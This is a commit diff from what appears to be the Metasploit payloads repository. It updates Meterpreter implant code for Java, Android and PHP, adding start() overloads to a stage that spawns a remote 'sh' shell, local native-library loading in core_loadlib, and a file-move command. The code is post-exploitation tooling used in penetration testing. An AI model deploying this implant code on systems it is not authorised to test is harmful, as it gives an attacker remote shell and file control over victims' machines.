resolve ambiguity with java and android getuid implementations

2025-01-20 20:37:27 +01:00 · 2016-11-14 00:43:49 -06:00 · 2016-11-14 00:43:49 -06:00 · d1c7961668
commit d1c7961668
parent b33437027c 9d21ece6fe
10 changed files with 78 additions and 26 deletions
--- a/c/meterpreter/source/common/common.h
+++ b/c/meterpreter/source/common/common.h
@ -6,7 +6,7 @@
 #define _METERPRETER_SOURCE_COMMON_COMMON_H

 /*! @brief Set to 0 for "normal", and 1 to "verbose", comment out to disable completely. */
-#define DEBUGTRACE 0
+//#define DEBUGTRACE 0

 #include <stdlib.h>
 #include <stdio.h>
@ -233,4 +233,4 @@ static _inline void real_dprintf(char *format, ...)
 #endif

 int current_unix_timestamp(void);
-VOID xor_bytes(DWORD xorKey, LPBYTE buffer, DWORD bufferSize);
+VOID xor_bytes(DWORD xorKey, LPBYTE buffer, DWORD bufferSize);
--- a/gem/lib/metasploit-payloads/version.rb
+++ b/gem/lib/metasploit-payloads/version.rb
@ -1,6 +1,6 @@
 # -*- coding:binary -*-
 module MetasploitPayloads
-  VERSION = '1.1.25'
+  VERSION = '1.1.27'

  def self.version
    VERSION
--- a/java/androidpayload/library/src/androidpayload/stage/Meterpreter.java
+++ b/java/androidpayload/library/src/androidpayload/stage/Meterpreter.java
@ -13,6 +13,14 @@ import dalvik.system.DexClassLoader;
 */
 public class Meterpreter {

+    // This is for backwards compatiblity with older (pre #136) payloads
+    public void start(DataInputStream in, OutputStream out, String[] parameters) throws Exception {
+        Object[] newParams = new Object[2];
+        newParams[0] = parameters[0];
+        newParams[1] = null;
+        start(in, out, newParams);
+    }
+
    public void start(DataInputStream in, OutputStream out, Object[] parameters) throws Exception {
        String path = (String) parameters[0];
        String filePath = path + File.separatorChar + "met.jar";
--- a/java/androidpayload/library/src/androidpayload/stage/Shell.java
+++ b/java/androidpayload/library/src/androidpayload/stage/Shell.java
@ -12,6 +12,11 @@ import javapayload.stage.StreamForwarder;
 */
 public class Shell {

+    // This is for backwards compatiblity with older (pre #136) payloads
+    public void start(DataInputStream in, OutputStream out, String[] parameters) throws Exception {
+        start(in, out, null);
+    }
+
    public void start(DataInputStream in, OutputStream out, Object[] parameters) throws Exception {
        final Process proc = Runtime.getRuntime().exec("sh");
        new StreamForwarder(in, proc.getOutputStream(), out).start();
--- a/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
@ -4,28 +4,9 @@ import android.content.Context;
 import android.os.Handler;
 import android.os.Looper;

+import com.metasploit.meterpreter.android.stdapi_sys_config_getuid;
 import com.metasploit.meterpreter.android.*;
-import com.metasploit.meterpreter.stdapi.Loader;
-import com.metasploit.meterpreter.stdapi.channel_create_stdapi_fs_file;
-import com.metasploit.meterpreter.stdapi.channel_create_stdapi_net_tcp_client;
-import com.metasploit.meterpreter.stdapi.channel_create_stdapi_net_tcp_server;
-import com.metasploit.meterpreter.stdapi.channel_create_stdapi_net_udp_client;
-import com.metasploit.meterpreter.stdapi.stdapi_fs_chdir;
-import com.metasploit.meterpreter.stdapi.stdapi_fs_delete_dir;
-import com.metasploit.meterpreter.stdapi.stdapi_fs_delete_file;
-import com.metasploit.meterpreter.stdapi.stdapi_fs_getwd;
-import com.metasploit.meterpreter.stdapi.stdapi_fs_ls;
-import com.metasploit.meterpreter.stdapi.stdapi_fs_md5;
-import com.metasploit.meterpreter.stdapi.stdapi_fs_mkdir;
-import com.metasploit.meterpreter.stdapi.stdapi_fs_search;
-import com.metasploit.meterpreter.stdapi.stdapi_fs_separator;
-import com.metasploit.meterpreter.stdapi.stdapi_fs_sha1;
-import com.metasploit.meterpreter.stdapi.stdapi_fs_stat;
-import com.metasploit.meterpreter.stdapi.stdapi_net_config_get_interfaces_V1_4;
-import com.metasploit.meterpreter.stdapi.stdapi_net_config_get_routes_V1_4;
-import com.metasploit.meterpreter.stdapi.stdapi_sys_config_localtime;
-import com.metasploit.meterpreter.stdapi.stdapi_net_socket_tcp_shutdown_V1_3;
-import com.metasploit.meterpreter.stdapi.stdapi_sys_process_execute_V1_3;
+import com.metasploit.meterpreter.stdapi.*;

 import java.io.DataInputStream;
 import java.io.File;
@ -128,6 +109,7 @@ public class AndroidMeterpreter extends Meterpreter {
        mgr.registerCommand("stdapi_fs_delete_dir", stdapi_fs_delete_dir.class);
        mgr.registerCommand("stdapi_fs_delete_file", stdapi_fs_delete_file.class);
        mgr.registerCommand("stdapi_fs_file_expand_path", stdapi_fs_file_expand_path_android.class);
+        mgr.registerCommand("stdapi_fs_file_move", stdapi_fs_file_move.class);
        mgr.registerCommand("stdapi_fs_getwd", stdapi_fs_getwd.class);
        mgr.registerCommand("stdapi_fs_ls", stdapi_fs_ls.class);
        mgr.registerCommand("stdapi_fs_mkdir", stdapi_fs_mkdir.class);
--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java
@ -205,4 +205,8 @@ public interface TLVType {
    int TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT            = TLVPacket.TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 39);
    int TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT    = TLVPacket.TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 40);

+    int LOAD_LIBRARY_FLAG_ON_DISK   = (1 << 0);
+    int LOAD_LIBRARY_FLAG_EXTENSION = (1 << 1);
+    int LOAD_LIBRARY_FLAG_LOCAL     = (1 << 2);
+
 }
--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/core_loadlib.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/core_loadlib.java
@ -8,12 +8,24 @@ import com.metasploit.meterpreter.command.Command;
 public class core_loadlib implements Command {

    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
-        byte[] data = request.getRawValue(TLVType.TLV_TYPE_DATA);
+        int flags = request.getIntValue(TLVType.TLV_TYPE_FLAGS);
+        byte[] data = request.getRawValue(TLVType.TLV_TYPE_DATA, null);
+        String libraryPath = request.getStringValue(TLVType.TLV_TYPE_LIBRARY_PATH, null);
+        String targetPath = request.getStringValue(TLVType.TLV_TYPE_TARGET_PATH, null);
+
+        if ((flags & TLVType.LOAD_LIBRARY_FLAG_LOCAL) != 0) {
+            try {
+                Runtime.getRuntime().load(targetPath);
+            } catch (UnsatisfiedLinkError e) {
+                return ERROR_FAILURE;
+            }
+            return ERROR_SUCCESS;
+        }
+
        String[] commands = meterpreter.loadExtension(data);
        for (int i = 0; i < commands.length; i++) {
            response.addOverflow(TLVType.TLV_TYPE_METHOD, commands[i]);
        }
-
        return ERROR_SUCCESS;
    }
 }
--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/Loader.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/Loader.java
@ -31,6 +31,7 @@ public class Loader implements ExtensionLoader {
        mgr.registerCommand("stdapi_fs_delete_dir", stdapi_fs_delete_dir.class);
        mgr.registerCommand("stdapi_fs_delete_file", stdapi_fs_delete_file.class);
        mgr.registerCommand("stdapi_fs_file_expand_path", stdapi_fs_file_expand_path.class, V1_2, V1_5); // %COMSPEC% only
+        mgr.registerCommand("stdapi_fs_file_move", stdapi_fs_file_move.class);
        mgr.registerCommand("stdapi_fs_getwd", stdapi_fs_getwd.class);
        mgr.registerCommand("stdapi_fs_ls", stdapi_fs_ls.class);
        mgr.registerCommand("stdapi_fs_mkdir", stdapi_fs_mkdir.class);
--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_fs_file_move.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_fs_file_move.java
@ -0,0 +1,26 @@
+package com.metasploit.meterpreter.stdapi;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+import java.io.File;
+import java.io.IOException;
+
+public class stdapi_fs_file_move implements Command {
+
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        String oldpath = request.getStringValue(TLVType.TLV_TYPE_FILE_NAME);
+        String path = request.getStringValue(TLVType.TLV_TYPE_FILE_PATH);
+        File file = Loader.expand(oldpath);
+        File dest = Loader.expand(path);
+        if (!file.exists() || !file.isFile()) {
+            throw new IOException("File not found: " + path);
+        }
+        if (!file.renameTo(dest)) {
+            throw new IOException("Cannot move " + file.getCanonicalPath() + " to " + dest.getCanonicalPath());
+        }
+        return ERROR_SUCCESS;
+    }
+}
--- a/php/meterpreter/ext_server_stdapi.php
+++ b/php/meterpreter/ext_server_stdapi.php
@ -373,6 +373,20 @@ function stdapi_fs_delete($req, &$pkt) {
 }
 }

+# works
+if (!function_exists('stdapi_fs_file_move')) {
+register_command('stdapi_fs_file_move');
+function stdapi_fs_file_move($req, &$pkt) {
+    my_print("doing mv");
+    $old_file_tlv = packet_get_tlv($req, TLV_TYPE_FILE_NAME);
+    $new_file_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
+    $old_file = cononicalize_path($old_file_tlv['value']);
+    $new_file = cononicalize_path($new_file_tlv['value']);
+    $ret = @rename($old_file, $new_file);
+    return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
+}
+}
+
 # works
 if (!function_exists('stdapi_fs_getwd')) {
 register_command('stdapi_fs_getwd');